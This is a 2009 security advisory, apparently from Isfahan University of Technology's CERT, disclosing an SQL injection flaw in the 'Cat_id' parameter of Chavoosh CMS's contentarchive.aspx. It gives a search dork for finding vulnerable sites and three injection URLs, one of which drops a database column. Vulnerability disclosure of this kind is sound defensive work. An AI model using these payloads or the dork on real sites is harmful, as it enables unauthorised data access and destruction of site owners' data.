Chavoosh CMS SQL Injection

2009-08-13T00:00:00
ID PACKETSTORM:80302
Type packetstorm
Reporter Isfahan University of Technology
Modified 2009-08-13T00:00:00

Description

                                        
                                            `================= IUT-CERT =================  
  
Title: Chavoosh CMS SQL Injection Vulnerability  
  
Vendor: www.chavoosh.com  
  
Dork: Design by chavoosh Co  
  
Type: Input.Validation.Vulnerability (SQL Injection)  
  
Fix: N/A  
  
================== nsec.ir =================  
  
Description:  
  
------------------  
  
Chavoosh is a CMS producer in Iran. “contentarchive.aspx” page in Chavoosh CMS  
  
product is vulnerable to SQL Injection vulnerability.  
  
Vulnerability Variant:  
  
------------------  
  
URI Injection "/contentarchive.aspx" in "Cat_id" parameter.  
  
http://example.com/content/contentarchive.aspx?Cat_id=82+UNION+SELECT+ @@version&Landir=rtl&Lan=Fa  
  
http://example.com/content/contentarchive.aspx?Cat_id=82+HAVING+1=1 &Landir=rtl&Lan=Fa  
  
http://example.com/content/contentarchive.aspx?Cat_id=82+ALTER+TABLE+contentcategory+DROP+COLUMN+category_name&Landir=rtl&Lan=Fa  
  
  
Solution:  
  
------------------  
  
Input validation of Parameter "Cat_id" should be corrected.  
  
Credit:  
  
------------------  
  
Isfahan University of Technology - Computer Emergency Response Team  
  
Thanks to : E. Jafari, N. Fathi, M. R. Faghani  
`